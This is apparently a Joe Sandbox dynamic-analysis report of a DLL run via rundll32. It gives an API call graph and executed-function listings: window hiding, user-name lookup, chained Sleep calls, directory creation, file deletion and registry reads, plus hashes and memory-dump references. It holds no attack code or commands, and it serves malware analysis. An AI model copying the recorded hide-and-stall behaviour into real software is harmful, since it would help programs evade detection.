6c8b4788 11697->11815 11819 6c7f0148 11698->11819 11702 6c983d82 11705 6c909808 11704->11705 11706 6c9097ff 11704->11706 11705->11706 11707 6c90982e LoadLibraryW 11705->11707 11706->11694 11803 6c7f14e4 11706->11803 11707->11706 11708 6c909843 11707->11708 11810 6c7d7214 11708->11810 11804 6c7f1511 11803->11804 11805 6c7f1525 GetFileVersionInfoSizeW 11804->11805 11806 6c7f1531 11805->11806 11809 6c7f157e 11805->11809 11807 6c7f155a GetFileVersionInfoW 11806->11807 11808 6c7f1564 VerQueryValueW 11807->11808 11807->11809 11808->11809 11811 6c7d7236 GetProcAddress 11810->11811 11813 6c7d7241 11810->11813 11812 6c7d7261 11811->11812 11814 6c7d7258 GetProcAddress 11813->11814 11814->11812 11816 6c8b4798 11815->11816 11818 6c8b47ab 11816->11818 11825 6c8b2d7c 11816->11825 11818->11702 11820 6c7f0156 11819->11820 11821 6c7d17ac 64 API calls 11820->11821 11822 6c7f0180 11821->11822 11823 6c7e9cd0 75 API calls 11822->11823 11824 6c7f018e 11823->11824 11829 6c8b2d89 11825->11829 11826 6c8b2d99 11834 6c8b66c0 11826->11834 11829->11826 11831 6c7eff2c 11829->11831 11837 6c7ca504 11831->11837 11860 6c7cdf8c 11834->11860 11838 6c7ca508 11837->11838 11841 6c7ca512 11837->11841 11843 6c7cacf8 11838->11843 11840 6c7ca550 11840->11840 11841->11840 11846 6c7c7220 11841->11846 11849 6c7cacec 11843->11849 11852 6c7d2528 11846->11852 11848 6c7c7225 11848->11840 11850 6c7cabbc 11 API calls 11849->11850 11851 6c7cacf6 11850->11851 11851->11841 11853 6c7d255d TlsGetValue 11852->11853 11854 6c7d2537 11852->11854 11855 6c7d2567 11853->11855 11856 6c7d2542 11853->11856 11854->11848 11855->11848 11857 6c7d245c 9 API calls 11856->11857 11858 6c7d2547 TlsGetValue 11857->11858 11859 6c7d2556 11858->11859 11859->11848 11861 6c7cdfaf 11860->11861 11863 6c7cdfca 11860->11863 11875 6c7ce378 11861->11875 11864 6c7ce037 11863->11864 11866 6c7ce0ff 11863->11866 11874 6c7ce09b 11864->11874 11879 6c7cdf48 11864->11879 11871 6c7ce145 11866->11871 11896 6c7cd504 11866->11896 11867 6c7cdfc5 11867->11818 11869 6c7cdf8c 60 API calls 11869->11874 11870 6c7ce378 16 API calls 11870->11874 11871->11870 11872 6c7ce04f 11872->11874 11889 6c7cd3d8 11872->11889 11874->11867 11874->11869 11876 6c7ce37e 11875->11876 11878 6c7ce3af 11875->11878 11876->11878 11900 6c7ccb24 11876->11900 11878->11867 11880 6c7d2528 11 API calls 11879->11880 11881 6c7cdf51 11880->11881 11882 6c7cdf59 11881->11882 11884 6c7cdf67 11881->11884 11883 6c7d2528 11 API calls 11882->11883 11885 6c7cdf5e 11883->11885 11886 6c7d2528 11 API calls 11884->11886 11885->11872 11887 6c7cdf75 11886->11887 11888 6c7d2528 11 API calls 11887->11888 11888->11885 11890 6c7cd3f4 11889->11890 11891 6c7cd43c 11889->11891 11890->11891 11892 6c7cd4a5 11890->11892 11893 6c7cd476 11890->11893 11891->11874 11892->11891 11911 6c7cd058 11892->11911 11893->11891 11894 6c7cd3d8 49 API calls 11893->11894 11894->11893 11897 6c7cd50d 11896->11897 11898 6c7cd515 11896->11898 11922 6c7cd2b4 11897->11922 11898->11871 11901 6c7ccb43 11900->11901 11902 6c7ccb90 11900->11902 11901->11902 11903 6c7ccce5 11901->11903 11904 6c7ccba0 11901->11904 11909 6c7ccbda 11901->11909 11910 6c7ccc3c 11901->11910 11902->11878 11903->11902 11906 6c7ce378 16 API calls 11903->11906 11905 6c7caf5c SysFreeString 11904->11905 11905->11902 11906->11903 11907 6c7ccb24 16 API calls 11907->11909 11908 6c7cc6e4 16 API calls 11908->11910 11909->11902 11909->11907 11910->11902 11910->11908 11912 6c7cd097 11911->11912 11913 6c7cd075 11911->11913 11912->11913 11914 6c7cd3d8 49 API calls 11912->11914 11915 6c7cb2f0 SysFreeString SysAllocStringLen SysReAllocStringLen 11912->11915 11916 6c7ce3bc 16 API calls 11912->11916 11917 6c7cd058 49 API calls 11912->11917 11918 6c7d136c 44 API calls 11912->11918 11919 6c7caed4 SysFreeString 11912->11919 11920 6c7ce378 16 API calls 11912->11920 11921 6c7d1340 14 API calls 11912->11921 11913->11892 11914->11912 11915->11912 11916->11912 11917->11912 11918->11912 11919->11912 11920->11912 11921->11912 11923 6c7cd2c9 11922->11923 11931 6c7cd305 11922->11931 11924 6c7cd2ce 11923->11924 11925 6c7cd327 11923->11925 11927 6c7cd366 11924->11927 11928 6c7cd2e1 11924->11928 11924->11931 11926 6c7cb2f0 SysFreeString SysAllocStringLen SysReAllocStringLen 11925->11926 11925->11931 11926->11925 11927->11931 11932 6c7cd2b4 49 API calls 11927->11932 11929 6c7cd2fc 11928->11929 11928->11931 11933 6c7cd3ba 11928->11933 11930 6c7cce8c 49 API calls 11929->11930 11929->11931 11930->11929 11931->11898 11932->11927 11933->11931 11934 6c7ce3bc 16 API calls 11933->11934 11934->11933 11963 6c87f5b0 11935->11963 11937 6c982779 11938 6c9827aa 11937->11938 11945 6c9827de 11937->11945 11967 6c87d2b4 11938->11967 11942 6c9827dc 11945->11942 11946 6c7f0148 75 API calls 11945->11946 11947 6c982819 11946->11947 11948 6c7ca504 11 API calls 11947->11948 11948->11942 11950 6c7e75cb 11949->11950 11951 6c7e75d7 11949->11951 12039 6c7e76c8 11950->12039 11951->11677 11957 6c7cc714 11954->11957 11955 6c7cc71f 11956 6c7cc79e 11956->11955 11959 6c7ccb24 16 API calls 11956->11959 11960 6c7cc6e4 16 API calls 11956->11960 11962 6c7ce378 16 API calls 11956->11962 12049 6c7caed4 11956->12049 11957->11955 11957->11956 12045 6c7d1340 11957->12045 11959->11956 11960->11956 11962->11956 11964 6c87f5bc 11963->11964 11970 6c87c918 11964->11970 11966 6c87f5d1 11966->11937 11992 6c87d334 11967->11992 11971 6c87c91e 11970->11971 11974 6c7f7c44 11971->11974 11973 6c87c938 11973->11966 11975 6c7f7c4d GetACP 11974->11975 11976 6c7f7c64 11974->11976 11978 6c7f9464 11975->11978 11976->11973 11979 6c7f9470 11978->11979 11980 6c7f948a 11979->11980 11981 6c7f9480 GetACP 11979->11981 11982 6c7f948d GetCPInfo 11980->11982 11981->11982 11983 6c7f94aa 11982->11983 11986 6c7f94c1 11982->11986 11988 6c7f0074 11983->11988 11985 6c7f94bc 11987 6c7ca504 11 API calls 11985->11987 11986->11976 11987->11986 11989 6c7f007b 11988->11989 11990 6c7d17ac 64 API calls 11989->11990 11991 6c7f0093 11990->11991 11991->11985 11993 6c87d368 11992->11993 11994 6c87d381 11993->11994 12001 6c7f48d8 11993->12001 11996 6c87d511 11996->11994 12013 6c7f5ba0 11996->12013 12000 6c87d459 12000->11996 12005 6c7f3f54 12000->12005 12009 6c7f43b0 12000->12009 12002 6c7f48de 12001->12002 12025 6c7f5ad0 12002->12025 12004 6c7f4906 12004->12000 12007 6c7f3f62 12005->12007 12006 6c7f3f8b 12006->12000 12007->12006 12035 6c7f4bdc 12007->12035 12010 6c7f43c0 12009->12010 12011 6c7f43d1 12010->12011 12012 6c7f4bdc 75 API calls 12010->12012 12011->12000 12012->12011 12014 6c7f5bdb 12013->12014 12015 6c7f5bb2 12013->12015 12017 6c7f5c07 12014->12017 12019 6c7f0148 75 API calls 12014->12019 12016 6c7f0148 75 API calls 12015->12016 12018 6c7f5bd6 12016->12018 12023 6c7f4bdc 75 API calls 12017->12023 12024 6c7f5c41 12017->12024 12020 6c7ca504 11 API calls 12018->12020 12021 6c7f5c02 12019->12021 12020->12014 12022 6c7ca504 11 API calls 12021->12022 12022->12017 12023->12024 12024->11994 12026 6c7f5adb 12025->12026 12028 6c7f5afd 12025->12028 12027 6c7f0148 75 API calls 12026->12027 12030 6c7f5af8 12027->12030 12029 6c7f5b24 12028->12029 12031 6c7f0148 75 API calls 12028->12031 12029->12004 12032 6c7ca504 11 API calls 12030->12032 12033 6c7f5b1f 12031->12033 12032->12028 12034 6c7ca504 11 API calls 12033->12034 12034->12029 12036 6c7f4be4 12035->12036 12037 6c7f5ad0 75 API calls 12036->12037 12038 6c7f4c12 12037->12038 12038->12006 12042 6c7e7684 12039->12042 12041 6c7e75d4 12041->11677 12043 6c7e7692 12042->12043 12044 6c7e76b3 CompareStringW 12043->12044 12044->12041 12046 6c7d134b 12045->12046 12047 6c7d1365 12045->12047 12052 6c7d1310 12046->12052 12047->11957 12050 6c7caee8 12049->12050 12051 6c7caeda SysFreeString 12049->12051 12050->11956 12051->12050 12053 6c7d1314 12052->12053 12054 6c7d1321 12052->12054 12056 6c7d0fd8 12053->12056 12054->12047 12057 6c7d1062 12056->12057 12058 6c7d0ff8 12056->12058 12057->12054 12062 6c7d0bb8 12058->12062 12060 6c7d1021 12066 6c7d0c20 12060->12066 12063 6c7d0bcb 12062->12063 12064 6c7d0bc1 12062->12064 12063->12060 12065 6c7c9a54 13 API calls 12064->12065 12065->12063 12067 6c7d0c29 12066->12067 12068 6c7d0c30 12066->12068 12069 6c7c9bec 2 API calls 12067->12069 12068->12057 12069->12068 12070 6cd3d12c 12073 6c9db850 12070->12073 12074 6c9db859 12073->12074 12128 6c9db2f4 12074->12128 12076 6c9db8b4 12134 6c9db7d0 FindWindowW 12076->12134 12080 6c9db8c1 12081 6c9db8dc 12080->12081 12082 6c7cabbc 11 API calls 12080->12082 12083 6c9db784 2 API calls 12081->12083 12082->12081 12084 6c9db8e4 12083->12084 12085 6c9db8ff 12084->12085 12086 6c7cabbc 11 API calls 12084->12086 12087 6c9db784 2 API calls 12085->12087 12086->12085 12088 6c9db907 12087->12088 12089 6c9db922 12088->12089 12141 6c7cabbc 12088->12141 12090 6c9db7d0 2 API calls 12089->12090 12092 6c9db927 12090->12092 12153 6c7f1e34 12092->12153 12094 6c9db956 12095 6c9db7d0 FindWindowW ShowWindow 12094->12095 12096 6c9db966 12095->12096 12097 6c7e8cf8 GetFileAttributesW CreateFileW CloseHandle CreateFileW CloseHandle 12096->12097 12098 6c9db993 12097->12098 12099 6c9db997 12098->12099 12103 6c9db9ac 12098->12103 12100 6c956b50 223 API calls 12099->12100 12101 6c9db9a5 12100->12101 12102 6c7cabbc 11 API calls 12101->12102 12104 6c9db9aa 12102->12104 12105 6c7e979c CreateDirectoryW 12103->12105 12106 6c9db7d0 FindWindowW ShowWindow 12104->12106 12105->12104 12107 6c9db9dc 12106->12107 12108 6c9db2f4 79 API calls 12107->12108 12109 6c9dba17 12108->12109 12110 6c9db784 GetSystemDefaultLangID VerLanguageNameW 12109->12110 12111 6c9dba27 12110->12111 12112 6c9db4d4 21 API calls 12111->12112 12113 6c9dba42 Sleep Sleep 12112->12113 12114 6c7e837c 75 API calls 12113->12114 12115 6c9dba6e 12114->12115 12116 6c9db0a0 83 API calls 12115->12116 12117 6c9dba7c Sleep Sleep Sleep 12116->12117 12118 6c9dbaaf 12117->12118 12119 6c9db348 129 API calls 12118->12119 12120 6c9dbaef Sleep Sleep 12119->12120 12121 6c9dbb0e 12120->12121 12122 6c9db600 26 API calls 12121->12122 12123 6c9dbb7c Sleep 12122->12123 12125 6c9dbbb0 12123->12125 12126 6c9db404 DeleteFileW 12125->12126 12127 6c9dbbc8 12126->12127 12129 6c9db30f 12128->12129 12130 6c9db31d GetUserNameW 12129->12130 12131 6c9db33e 12130->12131 12132 6c9db327 12130->12132 12168 6c7f304c GetLastError 12131->12168 12132->12076 12135 6c9db7ff ShowWindow 12134->12135 12136 6c9db80a 12134->12136 12135->12136 12137 6c9db784 12136->12137 12184 6c7c7128 12137->12184 12139 6c9db797 GetSystemDefaultLangID VerLanguageNameW 12140 6c9db7c3 12139->12140 12140->12080 12142 6c7cabd2 12141->12142 12143 6c7cabe3 12141->12143 12186 6c7cab24 12142->12186 12144 6c7cabec GetCurrentThreadId 12143->12144 12146 6c7cabf9 12143->12146 12144->12146 12148 6c7c71ec 8 API calls 12146->12148 12149 6c7cac93 FreeLibrary 12146->12149 12150 6c7cacbb 12146->12150 12147 6c7cabdc 12147->12143 12148->12146 12149->12146 12151 6c7cacca ExitProcess 12150->12151 12152 6c7cacc4 12150->12152 12152->12151 12154 6c7f1e6f 12153->12154 12160 6c7f1f00 12154->12160 12167 6c7f1e8f 12154->12167 12194 6c7e75e8 12154->12194 12158 6c7f1ecd 12158->12160 12161 6c7e75e8 CharUpperBuffW 12158->12161 12159 6c7ce378 16 API calls 12162 6c7f247b 12159->12162 12164 6c7f1ffb 12160->12164 12166 6c7f1f5f 12160->12166 12161->12160 12164->12167 12205 6c7ce254 12164->12205 12166->12167 12202 6c7f5fa4 12166->12202 12167->12159 12171 6c7f305c 12168->12171 12172 6c7f307f 12171->12172 12173 6c7f30c0 12171->12173 12179 6c7ee5b8 12172->12179 12174 6c7f0074 64 API calls 12173->12174 12176 6c7f30bb 12174->12176 12180 6c7ee5cf FormatMessageW 12179->12180 12181 6c7ee5c9 12179->12181 12182 6c7ee5f1 12180->12182 12181->12180 12183 6c7ee617 LocalFree 12182->12183 12185 6c7c712c 12184->12185 12185->12139 12187 6c7cab8b 12186->12187 12189 6c7cab2e GetStdHandle WriteFile 12186->12189 12187->12147 12192 6c7cb7f4 12189->12192 12193 6c7cab7b GetStdHandle WriteFile 12192->12193 12193->12147 12195 6c7e75f2 12194->12195 12196 6c7e7607 CharUpperBuffW 12195->12196 12197 6c7e7610 12195->12197 12196->12197 12198 6c7e7614 12197->12198 12199 6c7e761e 12198->12199 12200 6c7e763c 12199->12200 12201 6c7e7633 CharLowerBuffW 12199->12201 12200->12158 12201->12200 12208 6c7f6120 12202->12208 12206 6c7cdf8c 60 API calls 12205->12206 12207 6c7ce25e 12206->12207 12207->12164 12211 6c7f5fc8 12208->12211 12212 6c7f5fda 12211->12212 12213 6c7f5ff3 12211->12213 12217 6c7f607c 12212->12217 12215 6c7f607c CompareStringW 12213->12215 12216 6c7f5fc1 12215->12216 12216->12166 12218 6c7f6095 12217->12218 12219 6c7f60ef CompareStringW 12218->12219 12220 6c7f60b7 12218->12220 12219->12220 12220->12216

                    Executed Functions

                    Function 6C7CFB50 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,6C7CFC12,?,?), ref: 6C7CFB82
                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,6C7CFC12,?,?), ref: 6C7CFB8B
                      • Part of subcall function 6C7CF9F8: FindFirstFileW.KERNEL32(00000000,?,00000000,6C7CFA58,?,?,?,6C7CFAFE,?,00000000,6C7CFB40,?,6C7E1FB8,?,?), ref: 6C7CFA2B
                      • Part of subcall function 6C7CF9F8: FindClose.KERNEL32(00000000,00000000,?,00000000,6C7CFA58,?,?,?,6C7CFAFE,?,00000000,6C7CFB40,?,6C7E1FB8,?,?), ref: 6C7CFA3B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                    • String ID:
                    • API String ID: 3216391948-0
                    • Opcode ID: 7272ecba81521d9adea434b9c7424c82d1b0dcc826d28bf60e03c362f2b67fa4
                    • Instruction ID: 0010f482c5dfe78c16a9728367708a5fb0a573d5ccb1f4468455537f2a6915de
                    • Opcode Fuzzy Hash: 7272ecba81521d9adea434b9c7424c82d1b0dcc826d28bf60e03c362f2b67fa4
                    • Instruction Fuzzy Hash: 4A118E70B0420A9FDB04DFA4DA99AEDB3B8EF49304F504475A410E7B50DB34AE088766
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CF9F8 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,6C7CFA58,?,?,?,6C7CFAFE,?,00000000,6C7CFB40,?,6C7E1FB8,?,?), ref: 6C7CFA2B
                    • FindClose.KERNEL32(00000000,00000000,?,00000000,6C7CFA58,?,?,?,6C7CFAFE,?,00000000,6C7CFB40,?,6C7E1FB8,?,?), ref: 6C7CFA3B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: cf5105be8046e8ef3f88c33bb163873910c608b188fc1a9f8f5277a341d01829
                    • Instruction ID: 9328e3d22a66f6f9470fdc6d9c576a67e0196bd477cf2277e2482e66f59f6883
                    • Opcode Fuzzy Hash: cf5105be8046e8ef3f88c33bb163873910c608b188fc1a9f8f5277a341d01829
                    • Instruction Fuzzy Hash: B0F0E971600A0AAFC750DB78DE5988EB7ECFB493287600971E414E3A50EB319F049612
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C956128 Relevance: 28.6, APIs: 14, Strings: 2, Instructions: 639windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 6c956128-6c956156 1 6c95615f-6c9562b8 call 6c7ccda0 call 6c955acc MulDiv call 6c8f720c call 6c92ab80 call 6c9b4ed0 call 6c9b52ac call 6c8f8c70 call 6c9b58e8 call 6c9b58cc call 6c9b52ac call 6c955794 MulDiv * 5 0->1 2 6c956158-6c95615d 0->2 28 6c9562bd-6c9562c1 1->28 2->1 2->2 29 6c9562c3-6c9562c6 28->29 30 6c9562cb 28->30 29->30 31 6c956356-6c95635d 30->31 32 6c9562d1-6c9562eb call 6c7d4e98 30->32 31->28 34 6c956363-6c956393 MulDiv * 2 call 6c9bb2cc 31->34 37 6c956300-6c956305 call 6c7d17ac 32->37 38 6c9562ed-6c9562fe call 6c7cb2c4 32->38 42 6c956395 34->42 43 6c956398-6c9563b9 SetRect call 6c9b52ac call 6c8f8d78 34->43 45 6c95630a-6c95633b call 6c92a498 call 6c7cbab4 call 6c9b52ac call 6c8f8d78 DrawTextW call 6c7d48d0 37->45 38->45 42->43 53 6c9563c0-6c956404 call 6c92a498 call 6c7cbab4 DrawTextW 43->53 54 6c9563bb-6c9563be 43->54 67 6c956340-6c956346 45->67 65 6c956406-6c956415 53->65 66 6c95641d-6c95641f 53->66 54->53 65->66 68 6c956417-6c95641a 65->68 69 6c956421-6c956426 66->69 67->31 70 6c956348-6c956353 call 6c7d48d0 67->70 68->66 71 6c956430 69->71 72 6c956428-6c95642b 69->72 70->31 74 6c956433-6c956437 71->74 75 6c956432 71->75 72->71 74->69 77 6c956439-6c956440 74->77 75->74 78 6c956452-6c956458 77->78 79 6c956442-6c95644f 77->79 80 6c956462-6c956465 78->80 81 6c95645a-6c956460 78->81 79->78 82 6c956468-6c95649b call 6c9b3cd4 call 6c9b3d0c 80->82 81->82 87 6c9564d2-6c9564df 82->87 88 6c95649d-6c9564ba call 6c926d1c 82->88 89 6c9564e1-6c9564fd call 6c926d1c 87->89 90 6c956512-6c956522 call 6c9bb2cc 87->90 97 6c9564bc 88->97 98 6c9564bf-6c9564d0 MulDiv call 6c9b3d0c 88->98 99 6c956502-6c95650d MulDiv call 6c9b3d0c 89->99 100 6c9564ff 89->100 101 6c956524 90->101 102 6c956527-6c95652c 90->102 97->98 98->90 99->90 100->99 101->102 105 6c956531-6c95654a call 6c9ba500 call 6c9bb2c4 102->105 106 6c95652e 102->106 112 6c95654c 105->112 113 6c95654f-6c956554 105->113 106->105 112->113 114 6c956556 113->114 115 6c956559-6c956566 call 6c9ba53c 113->115 114->115 118 6c956587-6c9565a1 call 6c9be454 call 6c927688 115->118 119 6c956568-6c956585 call 6c7d17ac call 6c927688 115->119 126 6c9565a6-6c9565a8 118->126 119->126 128 6c9565ae-6c9565de call 6c959e04 126->128 129 6c9566bb-6c956731 call 6c93f644 call 6c9403b8 call 6c927688 call 6c926ca0 call 6c7c9430 126->129 139 6c9565f4-6c95664f call 6c8fba54 call 6c956074 call 6c902780 call 6c8fba54 call 6c902970 call 6c95a440 call 6c95a470 128->139 140 6c9565e0-6c9565e8 128->140 170 6c956743-6c95675f 129->170 171 6c956733-6c956740 call 6c926cdc 129->171 158 6c956677-6c95667b 139->158 142 6c956651-6c95666f LoadIconW call 6c8fba6c call 6c901864 140->142 143 6c9565ea-6c9565f2 140->143 142->158 143->139 143->142 161 6c9566a3-6c9566b3 158->161 162 6c95667d-6c9566a1 call 6c926cdc 158->162 161->129 162->129 177 6c956767-6c95676b 170->177 178 6c956761-6c956765 170->178 171->170 181 6c956773 177->181 182 6c95676d-6c956771 177->182 180 6c956777-6c956783 call 6c926cdc 178->180 188 6c956785 180->188 189 6c956788-6c956792 180->189 181->180 182->180 188->189 190 6c956796-6c95679a 189->190 191 6c9567a6 190->191 192 6c95679c-6c9567a4 190->192 193 6c9567aa-6c9567ae 191->193 192->193 194 6c9567b0-6c9567b3 193->194 195 6c9567b8 193->195 194->195 196 6c9568a6-6c9568ad 195->196 197 6c9567be-6c9567c7 call 6c9420fc 195->197 196->190 199 6c9568b3-6c9568ea call 6c7caeec call 6c7cae8c call 6c7ccb24 196->199 200 6c9567cc-6c9567f9 197->200 208 6c95680e-6c956829 call 6c7d17ac call 6c927688 200->208 209 6c9567fb-6c95680c call 6c927688 200->209 215 6c95682e-6c956841 208->215 209->215 217 6c956857-6c95685a 215->217 218 6c956843-6c956852 call 6c9428a4 call 6c9b6b0c 215->218 219 6c956866-6c956891 217->219 220 6c95685c-6c95685f 217->220 218->217 219->196 225 6c956893-6c95689c 219->225 220->219 225->196
                    APIs
                    • MulDiv.KERNEL32(?,?,?), ref: 6C9561E2
                    • MulDiv.KERNEL32(00000008,?,00000004), ref: 6C95626D
                    • MulDiv.KERNEL32(00000008,?,00000008), ref: 6C95627D
                    • MulDiv.KERNEL32(0000000A,?,00000004), ref: 6C95628A
                    • MulDiv.KERNEL32(0000000A,?,00000008), ref: 6C95629A
                    • MulDiv.KERNEL32(00000032,?,00000004), ref: 6C9562A7
                    • DrawTextW.USER32(00000000,00000000,000000FF,?,00000000), ref: 6C956333
                    • MulDiv.KERNEL32(0000000E,?,00000008), ref: 6C95636B
                    • MulDiv.KERNEL32(00000004,?,00000004), ref: 6C95637B
                    • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 6C9563A1
                    • DrawTextW.USER32(00000000,00000000,?,?,?), ref: 6C9563E3
                    • MulDiv.KERNEL32(?,?,?), ref: 6C9564C0
                    • MulDiv.KERNEL32(?,?,?), ref: 6C956503
                      • Part of subcall function 6C9BE454: GetWindowTextW.USER32(?,?,00000100), ref: 6C9BE483
                    • LoadIconW.USER32(00000000,00000000), ref: 6C956654
                      • Part of subcall function 6C901864: GetIconInfo.USER32(00000000,?), ref: 6C901885
                      • Part of subcall function 6C901864: GetObjectW.GDI32(?,00000018,?), ref: 6C9018A6
                      • Part of subcall function 6C901864: DeleteObject.GDI32(?), ref: 6C9018D2
                      • Part of subcall function 6C901864: DeleteObject.GDI32(?), ref: 6C9018DB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: ObjectText$DeleteDrawIcon$InfoLoadRectWindow
                    • String ID: Image$Message
                    • API String ID: 230890831-2924779532
                    • Opcode ID: f816536b61b12410b2d8a5c736818d9ac7658b305f24f39bc44b11bf4af85951
                    • Instruction ID: 05babc4b9fbcecfaadd50bb416e50e4b290ff3fd0647dccda403690f306e6f58
                    • Opcode Fuzzy Hash: f816536b61b12410b2d8a5c736818d9ac7658b305f24f39bc44b11bf4af85951
                    • Instruction Fuzzy Hash: 2B423774B002089FDB00DFA8C984ADDBBB5BF59308F948165E918EBB55CB34ED5ACB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CF614 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 178registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,6C7CF83C,?,?,?), ref: 6C7CF653
                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,00020019,?,00000000,6C7CF83C,?,?,?), ref: 6C7CF69C
                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,00020019,?,80000001,Software\Embarcadero\Locales,00000000,00020019,?,00000000,6C7CF83C,?,?,?), ref: 6C7CF6BE
